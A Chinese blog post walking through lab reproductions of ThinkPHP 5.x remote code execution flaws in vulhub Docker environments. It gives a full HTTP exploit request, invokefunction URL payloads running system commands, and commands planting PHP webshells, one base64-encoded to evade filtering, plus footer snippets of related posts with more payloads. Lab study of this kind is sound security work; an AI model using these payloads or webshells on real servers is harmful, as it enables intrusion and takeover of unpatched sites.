Thinkphp漏洞复现

已于 2024-07-15 14:45:20 修改
阅读量690 收藏 14
点赞数 30
文章标签: 网络安全
于 2024-07-09 14:44:43 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_74928613/article/details/140295271
版权

安装vulhub

  1. git clone https://github.com/vulhub/vulhub.git 下载vulhub。

2、安装docker-compose

1、复现ThinkPHP5 5.0.23

切换到vulhub/thinkphp/5.0.23-rce目录下,运行环境:docker-compose up -d

(1)burpsuite抓包。

(2)send to repeater,执行命令:

POST /index.php?s=captcha HTTP/1.1

Host: 192.xxx.xxx.xxx:8080

Accept-Encoding: gzip, deflate

Accept: */*

Accept-Language: en

User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)

Connection: close

Content-Type: application/x-www-form-urlencoded

Content-Length: 73

_method=__construct&filter[]=system&method=get&server[REQUEST_METHOD]=pwd

(3)写入phpinfo:

`echo "<?php phpinfo(); ?>" > /var/www/public/info.php`

(4)查看是否写入:

ls%20-al

cat%20/var/www/public/info.php

(5)访问查看:http://ip:8080/info.php

(6)上传shell:

echo%20"<?php%20@eval($_REQUEST['pass']);%20?>"%20>%20/var/www/public/pass.php

(7)查看:cat%20pass.php,发现被过滤了。

(8)内容base64编码:

echo%20-n%20YWFhPD9waHAgQGFzc2VydCgkX1BPU1RbJzEyMyddKTsgPz5iYmI=%20|%20base64%20-d>%20/var/www/public/pass.php

该payload未编码前:

echo%20-n%20aaa<?php @assert($_POST['123']); ?>bbb%20|%20base64%20-d>%20/var/www/public/pass.php

(9)查看:cat%20pass.php

(10)访问:http://ip:8080/pass.php?123=phpinfo();

(11)蚁剑连接。

(12)右击选择文件管理。

2、复现ThinkPHP5 5.0.22/5.1.29

环境搭建:

cd /vulhub/thinkphp/5-rce

ls

修改端口映射:vim docker-compose.yml

将8080:80改为8087:80

docker-compose up -d

浏览器访问:

http://ip:8087

(1)POC:

①/index.php?s=/Index/\think\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=-1

②/index.php?s=/Index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=whoami

利用phpinfo函数获取phpinfo:

/index.php?s=/Index/\think\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=-1

(2)利用system函数,获取网站目录文件:

/index.php?s=/Index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=ls

/index.php?s=/Index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=pwd

(3)写入文件:`echo "<?php phpinfo(); ?>" > /var/www/public/info.php`

访问查看:http://ip:8087/info.php

(4)base64编码后上传shell:

echo%20-n%20YWFhPD9waHAgQGFzc2VydCgkX1JFUVVFU1RbJzEyMyddKTsgPz5iYmI=%20|%20base64%20-d>%20/var/www/public/pass.php

编码内容:aaa<?php @assert($_REQUEST['123']); ?>bbb

Base64编码后:YWFhPD9waHAgQGFzc2VydCgkX1JFUVVFU1RbJzEyMyddKTsgPz5iYmI=

(5)访问:http://ip:8087/pass.php?123=phpinfo();

(6)蚁剑连接。

(7)右击选择文件管理。

实验总结: ThinkPHP是一个快速、兼容而且简单的轻量级国产PHP开发框架,使用面向对象的开发结构和MVC模式,融合了Struts的思想和TagLib(标签库)、RoR的ORM映射和ActiveRecord模式。Thinkphp漏洞检测工具,可以检测到14个常见的Thinkphp漏洞。

喵叽wa
关注
  • 30
    点赞
  • 14
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
漏洞复现ThinkPHP 2.x/5.0.x/5.1.x/5 in-sqlinjection 命令执行漏洞
weixin_45556536的博客
11-24 1273
Thinkphp—2-rce一级目录二级目录三级目录涉及版本漏洞复现2-rce 一级目录 二级目录 三级目录 涉及版本 5.0.8-5.0.13 不需要开启debug // payload POST /tp5010/public/index.php?s=index/index/index HTTP/1.1 Host: 127.0.0.1:8000 Content-Length: 52 Content-Type: application/x-www-form-urlencoded s=whoami&a
渗透测试之路:ThinkPHP漏洞复现
m0_68353775的博客
01-10 2319
其实ThinkPH框架漏洞大多用到的都是设置对于控制器名的一个疏忽问题,不理解的小伙伴可以查来url调用文件的机制来学习一下,其实这些框架漏洞都是基于基础漏洞的一些拓展,至于sql漏洞,了解一下pdo预编译原理即可。不管java或是php在进行数据库查询的时候都应该进行pdo预编译,我们都知道,在jdbc工作的时候分成好多步1.建立连接2.写入sql语句3.预编译sql语句4.设置参数5.执行sql获取结果6.遍历结果(处理结果)7.关闭连接。
thinkphp漏洞复现
m0_52920608的博客
11-04 603
thinkphp漏洞复现
2024年ThinkPHP漏洞合集(专注渗透视角)_thinkphp v6,2024年最新网络安全面试数据结构算法
2401_84301389的博客
05-10 1374
服务框架是指某领域一类服务的可复用设计与不完整的实现,与软件框架不同的是,服务框架同时体现着面向服务,一个服务框架可以分为两个主要部分:服务引擎、引入的外部服务。ThinkPHP,是为了简化企业级应用开发和敏捷WEB应用开发而诞生的开源轻量级PHP框架。可想而知框架连接着网络和系统接触着越来越多的关键数据,渐渐成为单位公共安全中最具有战略性的资产,框架的安全稳定运行也直接决定着业务系统能否正常使用。
ThinkPHP V6.0.12LTS反序列化漏洞复现源码
最新发布
07-29
ThinkPHP 是一个流行的 PHP 框架,其 6.0.12 LTS 版本中曾经存在一个反序列化漏洞。这类漏洞可能会被恶意攻击者利用来执行任意代码,危害系统安全。
漏洞通告ThinkPHP远程代码执行漏洞
05-05
漏洞通告】ThinkPHP远程代码执行漏洞
ThinkPHP 5.0 远程代码执行漏洞分析
02-21
### ThinkPHP 5.0 远程代码执行漏洞分析 #### 漏洞背景与概述 ThinkPHP是一款广泛使用的PHP框架,它提供了丰富的功能和良好的性能。然而,如同任何复杂的软件系统一样,它也存在安全漏洞。本次分析的焦点集中在...
thinkphp 远程代码执行漏洞poc
12-11
漏洞影响范围:v5.x < 5.1.31,<= 5.0.23 可以利用poc直接检测目标网站是否存在漏洞
ThinkPHP v5.0.24 完整版
10-22
 ThinkPHP借鉴了国外很多优秀的框架和模式,使用面向对象的开发结构和MVC模式,采用单一入口模式等,融合了Struts的 Action思想和JSP的TagLib(标签库)、RoR的ORM映射和ActiveRecord模式,封装了CURD和一些常用操作...
Thinkphp 5.0.x_5.1.x 变量覆盖 RCE 漏洞分析1
08-03
### ThinkPHP 5.0.x/5.1.x 变量覆盖远程代码执行(RCE)漏洞分析 #### 漏洞概述 ThinkPHP 5.0.x 和 5.1.x 版本中存在一个变量覆盖导致的远程代码执行(RCE)漏洞。该漏洞利用者可以通过对特定HTTP请求参数的精心...
bfengj#CTF#thinkphp5.0.24反序列化rce1
07-25
thinkphp5.0.24反序列化rceModel是抽象类protected $append = [];// $value值,作为call函数引用的第二变量p
Think.PHP框架漏洞复现
m0_71300782的博客
09-13 972
2.服务器启动先cd到thinkphp文件夹下面的5-rce里面,然后docker-compose up -d 安装环境3.进入浏览器ip地址加8080看见。
漏洞复现ThinkPHP3.2.x RCE 漏洞复现
m0_46344990的博客
04-10 4221
目录 一,漏洞描述 二,漏洞发现 三、漏洞利用 本人是一个小白,目前大三计算机专业,出于对网络安全的热爱自学了好久。在学习网络安全的路上简直坎坷,有时候迷茫有时候又找到了方向,全凭自己摸索。啊,真希望有个老师傅能带带我。这也是我第一次复现漏洞,还不会thinkphp框架,就先看视频自学了几天,才把这个漏洞琢磨透。。。结合网上其他文章修改总结了一下。要是有错误或者不合理的地方,也请多多担待。 一,漏洞描述 描述: ThinkPHP是一套开源的、基于PHP的轻量级Web应用开发框...
ThinkPHP历史漏洞复现
weixin_53747497的博客
03-05 1146
Thinkphp 是一种开源框架。是一个由国人开发的支持 windows/Unix/Linux 等服务器环境的轻量级PHP开发框架。很多cms就是基于 thinkphp 二次开发的,所以 thinkphp 出问题的话,会影响很多基于 thinkphp开发的网站。例如:KenCMS、ThinkCMF、DuxCMS、易优CMS。版本漏洞缓存函数设计缺陷可导致Getshell最新版update注入漏洞find_select_delete注入order_by注入漏洞sql注入漏洞
Thinkphp5.1.4漏洞复现
05-11
ThinkPHP 5.1.4 存在一个参数绑定漏洞,攻击者可以通过构造特定的请求,执行任意代码。 以下是漏洞复现的步骤: 1. 下载 ThinkPHP 5.1.4,创建一个名为 `demo` 的项目。 2. 在 `demo/application/index/controller` 目录下创建一个名为 `Index.php` 的控制器,添加以下代码: ```php <?php namespace app\index\controller; use think\Controller; class Index extends Controller { public function index($name = '') { $this->assign('name', $name); return $this->fetch(); } } ``` 3. 在 `demo/application/index/view` 目录下创建一个名为 `index.html` 的模板文件,添加以下代码: ```html <html> <head> <title>ThinkPHP 5.1.4 Demo</title> </head> <body> <h1>Hello, {$name}!</h1> </body> </html> ``` 4. 启动本地服务器,访问 `http://localhost:8000/index/index`,可以看到页面上显示了 "Hello, !"。 5. 构造以下 payload,并发送 GET 请求: ``` http://localhost:8000/index/index/name/${@phpinfo()}; ``` 注意,这里的 `${}` 是模板引擎的语法,可以在模板中执行 PHP 代码。`@` 符号可以防止 PHP 报错。 6. 页面上将显示 PHPinfo 的信息,说明漏洞已被成功利用。 为了修复漏洞,需要将 ThinkPHP 升级到 5.1.5 及以上版本。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值